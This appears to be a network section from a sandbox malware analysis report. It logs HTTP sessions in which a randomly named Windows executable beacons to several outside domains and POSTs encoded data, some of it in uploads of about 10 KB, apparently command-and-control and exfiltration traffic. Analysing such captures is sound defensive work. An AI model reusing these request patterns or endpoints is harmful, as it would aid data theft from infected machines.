www.811371bb10.buzz

www.rtp189z.lat

www.u75lmwdgp0du.homes

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	199.59.243.228	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:19:31.328170061 CET	466	OUT	GET /ajra/?idTDev6P=2p4airO795Dn7gjI0Dv91awJZZT6XeJxn45z7/EQvQ5Z540aLfhYPACGMudBmeh/HdMergqqhhWIcIC0VgXLt2IUp0UaNuBDF/7fv0VCCEc7XsfSWpnh1zI=&z2=LHT8eHbp3J HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Host: www.zucchini.pro Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Jan 13, 2025 10:19:31.792589903 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 13 Jan 2025 09:19:31 GMT content-type: text/html; charset=utf-8 content-length: 1466 x-request-id: d3b13308-c6f2-42e8-b076-8ea0804584de cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_m3tMtGRJxw+J8uucK1dXlyffpEpRjQtHhgyqn1iIWQNJ4+doeWHYV3Q9hhGV7YOqAMu5QuA60iNy2ZP9DjzLAw== set-cookie: parking_session=d3b13308-c6f2-42e8-b076-8ea0804584de; expires=Mon, 13 Jan 2025 09:34:31 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6d 33 74 4d 74 47 52 4a 78 77 2b 4a 38 75 75 63 4b 31 64 58 6c 79 66 66 70 45 70 52 6a 51 74 48 68 67 79 71 6e 31 69 49 57 51 4e 4a 34 2b 64 6f 65 57 48 59 56 33 51 39 68 68 47 56 37 59 4f 71 41 4d 75 35 51 75 41 36 30 69 4e 79 32 5a 50 39 44 6a 7a 4c 41 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_m3tMtGRJxw+J8uucK1dXlyffpEpRjQtHhgyqn1iIWQNJ4+doeWHYV3Q9hhGV7YOqAMu5QuA60iNy2ZP9DjzLAw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 13, 2025 10:19:31.792609930 CET	919	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDNiMTMzMDgtYzZmMi00MmU4LWIwNzYtOGVhMDgwNDU4NGRlIiwicGFnZV90aW1lIjoxNzM2NzU5OT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49779	104.21.13.141	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:19:55.045418024 CET	732	OUT	POST /q1v9/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.ogbos88.cyou Origin: http://www.ogbos88.cyou Referer: http://www.ogbos88.cyou/q1v9/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 69 64 54 44 65 76 36 50 3d 72 63 46 52 30 53 63 72 71 50 68 2f 77 54 38 73 65 49 7a 49 58 39 32 61 6d 6d 45 31 54 4d 43 79 4b 6d 31 6c 33 4c 46 6e 5a 68 33 62 59 4e 58 2f 6a 69 56 32 62 4b 6f 70 73 54 79 70 71 38 43 58 65 65 48 36 5a 6e 43 41 44 4c 35 44 48 75 58 77 71 77 4f 38 33 32 4c 70 79 67 59 4f 6f 49 32 6f 41 57 50 6a 4e 41 55 6f 63 50 55 61 6c 50 38 36 6a 58 69 79 6d 37 32 77 7a 30 72 74 75 6d 48 5a 65 47 47 6a 55 79 56 6c 6f 58 39 64 55 48 69 4c 7a 41 6b 5a 59 6b 56 33 32 55 52 41 43 41 77 72 72 4b 50 67 58 6a 79 78 6c 76 4a 58 65 2f 68 50 2b 66 77 4c 5a 44 78 6c 7a 2b 33 4b 73 7a 73 34 35 51 3d 3d Data Ascii: idTDev6P=rcFR0ScrqPh/wT8seIzIX92ammE1TMCyKm1l3LFnZh3bYNX/jiV2bKopsTypq8CXeeH6ZnCADL5DHuXwqwO832LpygYOoI2oAWPjNAUocPUalP86jXiym72wz0rtumHZeGGjUyVloX9dUHiLzAkZYkV32URACAwrrKPgXjyxlvJXe/hP+fwLZDxlz+3Kszs45Q==
Jan 13, 2025 10:19:55.500876904 CET	804	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 13 Jan 2025 09:19:55 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Mon, 13 Jan 2025 10:19:55 GMT Location: https://ogbos88vip.click Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vy3Km3feohEgmd3MWDrJIwwmdj1J9Eze0zCxuWA9dP3pB6r7IKcnHdkJr94e5K3ilXeBgjMForu6G3%2F%2F5cydVle%2BD6YM0f9uYQ9ciibL9Q3HZMy02knhqydhhzbgwLYfITWY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 90144eb38b94c43b-EWR Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49795	104.21.13.141	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:19:57.595248938 CET	752	OUT	POST /q1v9/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.ogbos88.cyou Origin: http://www.ogbos88.cyou Referer: http://www.ogbos88.cyou/q1v9/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 69 64 54 44 65 76 36 50 3d 72 63 46 52 30 53 63 72 71 50 68 2f 79 33 34 73 62 72 72 49 44 74 32 5a 70 47 45 31 64 73 43 32 4b 6d 70 6c 33 4f 39 33 5a 33 66 62 59 73 48 2f 6b 6a 56 32 59 4b 6f 70 6d 7a 79 77 6b 63 44 62 65 65 4b 51 5a 6e 2b 41 44 4c 74 44 48 76 6e 77 32 54 6d 2f 32 6d 4c 33 30 67 59 41 6c 6f 32 6f 41 57 50 6a 4e 41 41 52 63 50 63 61 6b 2f 4d 36 68 32 69 39 72 62 32 2f 6a 45 72 74 71 6d 47 51 65 47 48 32 55 77 68 50 6f 52 68 64 55 48 53 4c 79 55 77 59 42 55 56 35 70 6b 51 50 4c 6c 52 52 79 37 6d 4a 53 46 61 6b 6a 39 45 32 57 5a 73 56 76 75 52 63 4c 44 56 57 75 35 2b 2b 68 77 52 78 69 59 2b 65 48 46 77 47 32 46 42 4f 74 67 41 6f 58 51 32 76 5a 79 49 3d Data Ascii: idTDev6P=rcFR0ScrqPh/y34sbrrIDt2ZpGE1dsC2Kmpl3O93Z3fbYsH/kjV2YKopmzywkcDbeeKQZn+ADLtDHvnw2Tm/2mL30gYAlo2oAWPjNAARcPcak/M6h2i9rb2/jErtqmGQeGH2UwhPoRhdUHSLyUwYBUV5pkQPLlRRy7mJSFakj9E2WZsVvuRcLDVWu5++hwRxiY+eHFwG2FBOtgAoXQ2vZyI=
Jan 13, 2025 10:19:58.027172089 CET	810	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 13 Jan 2025 09:19:57 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Mon, 13 Jan 2025 10:19:57 GMT Location: https://ogbos88vip.click Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oMcw9GRKCfnya062kU0OR%2FyUb3mXUf0a%2F%2FMR1t5GQnGFy2aNPya05tL2uPUM%2Fo2D3XX8pmEfbCJp0OxUreLKShHE5YYhr%2FeBwgDsv5muKVPLiTcO7kFvXTann9r0D%2FhAPnPZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 90144ec35d0a5e7a-EWR Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49812	104.21.13.141	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:20:00.138780117 CET	10834	OUT	POST /q1v9/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.ogbos88.cyou Origin: http://www.ogbos88.cyou Referer: http://www.ogbos88.cyou/q1v9/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10305 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 69 64 54 44 65 76 36 50 3d 72 63 46 52 30 53 63 72 71 50 68 2f 79 33 34 73 62 72 72 49 44 74 32 5a 70 47 45 31 64 73 43 32 4b 6d 70 6c 33 4f 39 33 5a 33 6e 62 66 65 66 2f 69 41 4e 32 5a 4b 6f 70 71 54 79 74 6b 63 43 42 65 64 36 55 5a 6e 7a 31 44 49 56 44 47 4e 76 77 6d 6d 53 2f 2f 6d 4c 33 32 67 59 42 6f 49 32 39 41 53 6a 6e 4e 41 51 52 63 50 63 61 6b 38 55 36 76 33 69 39 70 62 32 77 7a 30 72 70 75 6d 47 38 65 46 32 4e 55 7a 4d 34 72 69 35 64 55 6e 43 4c 77 6e 59 59 4a 55 55 66 71 6b 52 51 4c 6c 56 30 79 37 36 6a 53 42 53 4f 6a 2f 59 32 56 74 64 55 77 65 74 59 49 53 42 52 79 35 72 66 34 54 34 39 6c 36 43 63 58 45 38 42 6c 6e 42 42 71 78 64 55 53 44 75 50 50 48 33 38 59 6f 69 7a 74 44 2f 64 66 6b 64 66 38 56 70 75 37 74 36 39 4f 38 58 55 34 74 77 68 78 30 50 4c 46 7a 76 70 72 43 49 72 75 78 52 6c 68 69 37 55 71 4d 41 53 6b 58 51 50 68 77 31 63 31 61 45 39 4e 75 57 69 30 63 55 71 51 43 38 43 54 77 61 52 47 68 2f 4f 51 72 52 55 76 2b 48 6a 79 6b 6f 6f 4e 39 43 32 6f 4e 4f 57 33 6f 62 6e 58 46 58 6f 61 [TRUNCATED] Data Ascii: idTDev6P=rcFR0ScrqPh/y34sbrrIDt2ZpGE1dsC2Kmpl3O93Z3nbfef/iAN2ZKopqTytkcCBed6UZnz1DIVDGNvwmmS//mL32gYBoI29ASjnNAQRcPcak8U6v3i9pb2wz0rpumG8eF2NUzM4ri5dUnCLwnYYJUUfqkRQLlV0y76jSBSOj/Y2VtdUwetYISBRy5rf4T49l6CcXE8BlnBBqxdUSDuPPH38YoiztD/dfkdf8Vpu7t69O8XU4twhx0PLFzvprCIruxRlhi7UqMASkXQPhw1c1aE9NuWi0cUqQC8CTwaRGh/OQrRUv+HjykooN9C2oNOW3obnXFXoaFpT87QGTKhhXjb3Xg0dCQfdbdTo7535PDVgTqEkT8n0hkSbuNZxpHuszvNCsIkcbxtUFhScY66k+m0l4PncLCy1HFjMbCQdUZKsiC9d2AlVurCkaxTYh4eJaRrEhpveoEhEdwBCftUElFcOx1EnaF5gaVduWDdtEP8FH686fGP5OCimPSUF2CqZaBRsRUYjmO5zBwNRgnYZVaQlBzvNlbcUfBCVLN+YFhr8+ibQgHy/aTJHhNJY4R+Mysf04QlMXjrwnQowT5gMa1jOSof3TQnb5dD19twqjPuY4u4iwt5tq2TLoNlFW/9vFif8MUboQ47fNSnP28j19b2AAwlYy1729z0wYFAne7aLLyr+PdB0w+KnTAPB0a8z4eS3Gaudpi0qF+56Vk3MqyeHlAVyZQmXheK2ezm96rB+XxabbxKStn4HqbwVWO/fi8AMNOfR3udWZQJiIldoVRG7au/nNRgTA5cXGrlivyz7jNAi6Y80WBEsuKZtN9oQgT7BMPVZuL3r4gNM9AOBr/MPl/emjSYDHL+VHqLXaDy+8MhtbZ1aEXdB5hbdPoElsRL9Ksg0NVh7t3wY86qiHmKumSBLwr2QISubOUu10FgXpRaFlv6OS+HNeJYbTmVAJTay+msT3J07suqfwnN91QgeoReZ5tpvr2RNt6hwpEP [TRUNCATED]
Jan 13, 2025 10:20:00.595264912 CET	806	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 13 Jan 2025 09:20:00 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Mon, 13 Jan 2025 10:20:00 GMT Location: https://ogbos88vip.click Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dYvSQis7PK3g0trXsUyAf%2BaBGfTTHxhljQb3bkEnVQCk6Fp23%2FPe3HkGE16P%2F6qvBN7ENPMgXPeju2LEHIoymAH1MoPPIpNl%2Bmzhp6Ngy2iwH7uHwX4EDvFvNIDYxrrLXJCx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 90144ed35db38c53-EWR Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49832	104.21.13.141	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:20:02.680124044 CET	466	OUT	GET /q1v9/?idTDev6P=metx3mUju98G7hAYbLi4XsmUgHwdedXXJmBU5YhJIGTDaOPtkjQkc7gqohOsrca8eeiGHEfgIoNXOYbhhBmf7T3N/CIVyK6RIDDiNH4cRPg0hdY8uXiShr8=&z2=LHT8eHbp3J HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Host: www.ogbos88.cyou Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Jan 13, 2025 10:20:03.318764925 CET	783	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 13 Jan 2025 09:20:03 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Mon, 13 Jan 2025 10:20:03 GMT Location: https://ogbos88vip.click Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3GUt1hKlveg10kaJkfBV5gsPVES%2BdUDzaamClptzyp9QMYq3TVo5ByPjCVz6GSF2j0UlWF8m7CtZ%2BaZuPS9n0GzFwSfIM9%2BdJw%2FN4B5nYGaxb637H8e8gLAdCOHAX0MvUyoM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90144ee32e645e7e-EWR Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49868	15.197.240.20	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:20:08.517261028 CET	744	OUT	POST /u8xw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.esscosaathi.info Origin: http://www.esscosaathi.info Referer: http://www.esscosaathi.info/u8xw/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 69 64 54 44 65 76 36 50 3d 76 2b 49 33 42 35 6e 6f 30 31 4b 30 6c 6d 64 5a 6c 32 72 74 44 5a 4a 4f 36 4c 48 52 32 66 37 58 52 56 41 37 74 46 59 65 5a 4f 70 41 34 70 44 78 35 54 55 58 59 64 53 44 6d 32 56 46 64 46 4a 54 71 4c 70 63 78 36 79 54 58 2b 4a 42 37 2b 47 56 76 2f 43 41 4e 50 72 47 68 46 55 6e 56 57 63 6b 6a 46 53 63 54 6a 75 73 6c 4b 4a 65 6b 64 65 34 4a 44 30 76 7a 30 4f 7a 4c 32 71 33 70 54 5a 67 75 70 69 58 63 67 46 4f 51 71 4d 6b 55 78 55 59 78 6c 4f 67 77 50 48 79 56 73 62 74 35 76 78 74 37 62 6d 69 50 41 42 75 66 39 79 50 71 48 34 67 48 59 6a 70 37 53 5a 61 48 4b 61 45 7a 4e 64 71 39 51 3d 3d Data Ascii: idTDev6P=v+I3B5no01K0lmdZl2rtDZJO6LHR2f7XRVA7tFYeZOpA4pDx5TUXYdSDm2VFdFJTqLpcx6yTX+JB7+GVv/CANPrGhFUnVWckjFScTjuslKJekde4JD0vz0OzL2q3pTZgupiXcgFOQqMkUxUYxlOgwPHyVsbt5vxt7bmiPABuf9yPqH4gHYjp7SZaHKaEzNdq9Q==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49884	15.197.240.20	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:20:11.059544086 CET	764	OUT	POST /u8xw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.esscosaathi.info Origin: http://www.esscosaathi.info Referer: http://www.esscosaathi.info/u8xw/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 69 64 54 44 65 76 36 50 3d 76 2b 49 33 42 35 6e 6f 30 31 4b 30 6a 48 74 5a 6e 56 44 74 45 35 4a 50 6d 62 48 52 39 2f 37 54 52 56 45 37 74 41 38 30 65 38 4e 41 39 37 62 78 33 32 6f 58 56 39 53 44 2b 47 56 4d 5a 46 4a 63 71 4b 55 68 78 35 71 54 58 36 68 42 37 2b 57 56 6f 49 65 44 50 66 72 45 71 6c 55 79 52 57 63 6b 6a 46 53 63 54 6a 36 57 6c 4b 68 65 6c 73 4f 34 50 6e 59 67 36 55 4f 73 64 47 71 33 74 54 5a 73 75 70 6a 77 63 6c 74 6f 51 6f 6b 6b 55 30 77 59 77 33 32 68 6e 2f 48 30 59 4d 61 43 2b 4b 59 63 79 4f 4b 6f 53 78 52 38 53 50 76 76 72 42 31 36 57 70 43 2b 70 53 39 70 61 4e 54 77 2b 4f 67 6a 6d 52 38 4c 47 5a 48 57 44 54 58 7a 33 64 36 45 76 74 6f 35 33 69 49 3d Data Ascii: idTDev6P=v+I3B5no01K0jHtZnVDtE5JPmbHR9/7TRVE7tA80e8NA97bx32oXV9SD+GVMZFJcqKUhx5qTX6hB7+WVoIeDPfrEqlUyRWckjFScTj6WlKhelsO4PnYg6UOsdGq3tTZsupjwcltoQokkU0wYw32hn/H0YMaC+KYcyOKoSxR8SPvvrB16WpC+pS9paNTw+OgjmR8LGZHWDTXz3d6Evto53iI=
Jan 13, 2025 10:20:11.527442932 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49896	15.197.240.20	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:20:13.607990026 CET	10846	OUT	POST /u8xw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.esscosaathi.info Origin: http://www.esscosaathi.info Referer: http://www.esscosaathi.info/u8xw/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10305 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 69 64 54 44 65 76 36 50 3d 76 2b 49 33 42 35 6e 6f 30 31 4b 30 6a 48 74 5a 6e 56 44 74 45 35 4a 50 6d 62 48 52 39 2f 37 54 52 56 45 37 74 41 38 30 65 38 46 41 68 59 54 78 34 78 38 58 55 39 53 44 33 6d 56 4a 5a 46 4a 37 71 4b 4e 71 78 35 6e 6b 58 38 6c 42 36 64 75 56 74 35 65 44 46 66 72 45 6c 46 55 6d 56 57 64 2b 6a 47 72 58 54 6a 71 57 6c 4b 68 65 6c 76 6d 34 4d 7a 30 67 32 30 4f 7a 4c 32 71 7a 70 54 59 35 75 70 72 4b 63 6c 68 65 51 35 45 6b 55 55 67 59 33 45 4f 68 6c 66 48 32 57 73 61 61 2b 4b 63 48 79 4b 72 58 53 78 6c 53 53 4e 7a 76 70 56 73 4e 42 49 62 6d 7a 43 77 7a 45 4f 76 7a 32 2b 38 79 68 79 49 41 57 70 37 52 64 79 65 45 34 37 37 36 32 39 34 44 6d 6e 43 50 79 70 44 46 4d 6c 43 30 55 6c 31 6d 6c 64 7a 31 69 48 45 65 38 2f 54 57 69 76 34 6f 4e 32 4d 36 76 56 52 54 4c 50 34 49 69 65 6c 62 76 59 46 41 4e 38 78 51 67 78 4e 61 74 61 77 68 48 68 69 56 74 68 68 65 35 77 36 31 6e 57 53 46 30 37 30 78 7a 59 56 33 62 4f 47 49 4d 57 4c 46 74 54 4e 67 75 34 6f 66 65 72 55 6d 33 66 4e 54 35 79 6d 50 61 [TRUNCATED] Data Ascii: 